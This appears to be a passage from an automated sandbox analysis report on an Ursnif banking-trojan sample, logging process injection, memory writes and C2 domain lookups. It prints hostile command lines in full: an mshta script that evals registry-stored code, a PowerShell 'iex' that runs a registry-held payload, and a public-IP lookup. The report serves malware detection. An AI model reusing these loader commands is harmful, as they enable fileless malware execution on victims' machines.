                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_0097198F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,49_2_0097198F
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_00980BC5 memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,49_2_00980BC5
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_0097CC4A FindFirstFileW,FindNextFileW,FindClose,FreeLibrary,49_2_0097CC4A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4B1552 LoadLibraryA,GetProcAddress,0_2_6E4B1552
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_045737F9 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,0_2_045737F9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BB37F9 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,3_2_04BB37F9
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_009737F9 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,49_2_009737F9

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: init.icecreambob.com
                      Source: C:\Windows\explorer.exeDomain query: art.microsoftsofymicrosoftsoft.at
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 194.147.86.221 80Jump to behavior
                      Maps a DLL or memory area into another processShow sources
                      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                      Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
                      Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
                      Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
                      Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
                      Source: C:\Windows\explorer.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
                      Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
                      Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                      Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
                      Compiles code for process injection (via .Net compiler)Show sources
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.0.csJump to dropped file
                      Allocates memory in foreign processesShow sources
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\control.exe base: 9D0000 protect: page execute and read and writeJump to behavior
                      Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1B4F85E0000 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1DA4C230000 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory allocated: C:\Windows\SysWOW64\cmd.exe base: 660000 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exeMemory allocated: C:\Windows\System32\rundll32.exe base: 2D2D64A0000 protect: page execute and read and write
                      Creates a thread in another existing process (thread injection)Show sources
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: BD4F1580
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: BD4F1580
                      Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
                      Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
                      Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
                      Source: C:\Windows\explorer.exeThread created: unknown EIP: BD4F1580
                      Source: C:\Windows\explorer.exeThread created: unknown EIP: BD4F1580
                      Source: C:\Windows\System32\control.exeThread created: unknown EIP: BD4F1580
                      Writes to foreign memory regionsShow sources
                      Source: C:\Windows\System32\loaddll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF7880B12E0Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF7880B12E0Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF7880B12E0Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 9D0000Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF7880B12E0Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 9FA000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFABD4F1580
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 2B60000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFABD4F1580
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 9FC000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFABD4F1580
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 30F0000
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 8C7CFF1000
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7386885000
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1B4F85E0000
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD217F000
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1DA4C230000
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11E6FC0
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 660000
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11E6FC0
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\System32\rundll32.exe base: 7FF66D755FD0
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\System32\rundll32.exe base: 2D2D64A0000
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\System32\rundll32.exe base: 7FF66D755FD0
                      Changes memory attributes in foreign processes to executable or writableShow sources
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute read
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute read
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute read
                      Source: C:\Windows\System32\control.exeMemory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
                      Injects code into the Windows Explorer (explorer.exe)Show sources
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3424 base: 9FA000 value: 00
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3424 base: 7FFABD4F1580 value: EB
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3424 base: 2B60000 value: 80
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3424 base: 7FFABD4F1580 value: 40
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3424 base: 9FC000 value: 00
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3424 base: 7FFABD4F1580 value: EB
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3424 base: 30F0000 value: 80
                      Modifies the context of a thread in another process (thread injection)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 4868Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3424
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3424
                      Source: C:\Windows\explorer.exeThread register set: target process: 3656
                      Source: C:\Windows\explorer.exeThread register set: target process: 4268
                      Source: C:\Windows\explorer.exeThread register set: target process: 4772
                      Source: C:\Windows\explorer.exeThread register set: target process: 6752
                      Source: C:\Windows\explorer.exeThread register set: target process: 5288
                      Source: C:\Windows\explorer.exeThread register set: target process: 1260
                      Source: C:\Windows\System32\control.exeThread register set: target process: 3424
                      Source: C:\Windows\System32\control.exeThread register set: target process: 6508
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dsd4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dsd4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\data.dll',#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))Jump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.cmdline'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF604.tmp' 'c:\Users\user\AppData\Local\Temp\a52acufz\CSCA20CD7516B4D483281CF5F38543E99A.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF652.tmp' 'c:\Users\user\AppData\Local\Temp\aixojixg\CSC8AF62C77111B490CBA18A772C2BF28D9.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES20A.tmp' 'c:\Users\user\AppData\Local\Temp\ddwuzigh\CSCFB1F6E3C794C45BDA93B7DDF91AC3ADC.TMP'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES47B.tmp' 'c:\Users\user\AppData\Local\Temp\keehvxm3\CSC58F6D56599B14CCABEBFA477BAE65D74.TMP'
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                      Source: explorer.exe, 0000001C.00000000.922381772.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
                      Source: loaddll32.exe, 00000000.00000002.1180480270.0000000001760000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.901511392.0000000001080000.00000002.00020000.sdmp, control.exe, 00000022.00000000.913668447.000002BECFFD0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.963472592.0000027D4CC60000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000002E.00000002.1181659032.000001B4F8C60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000030.00000000.1037524894.000001DA4A460000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: loaddll32.exe, 00000000.00000002.1180480270.0000000001760000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.884577351.0000000005E50000.00000004.00000001.sdmp, control.exe, 00000022.00000000.913668447.000002BECFFD0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.963472592.0000027D4CC60000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000002E.00000002.1181659032.000001B4F8C60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000030.00000000.1037524894.000001DA4A460000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.1180480270.0000000001760000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.901511392.0000000001080000.00000002.00020000.sdmp, control.exe, 00000022.00000000.913668447.000002BECFFD0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.963472592.0000027D4CC60000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000002E.00000002.1181659032.000001B4F8C60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000030.00000000.1037524894.000001DA4A460000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000002.1180480270.0000000001760000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.901511392.0000000001080000.00000002.00020000.sdmp, control.exe, 00000022.00000000.913668447.000002BECFFD0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.963472592.0000027D4CC60000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000002E.00000002.1181659032.000001B4F8C60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000030.00000000.1037524894.000001DA4A460000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: explorer.exe, 0000001C.00000000.889230048.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,0_2_6E4B105E
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00DD2E33 cpuid 0_2_00DD2E33
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4B109B GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,0_2_6E4B109B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00DD2E33 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,0_2_00DD2E33
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0457D8BC CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,0_2_0457D8BC
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4B1C6F CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_6E4B1C6F

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822188626.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.825298638.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820080731.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072894975.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072798456.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820057009.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820031645.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883901477.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.917425679.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820138747.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000002.1074072106.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.834818320.00000000052DC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072599923.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072653572.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822158100.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.981565141.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883872155.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.828362336.00000000037CC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072532170.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
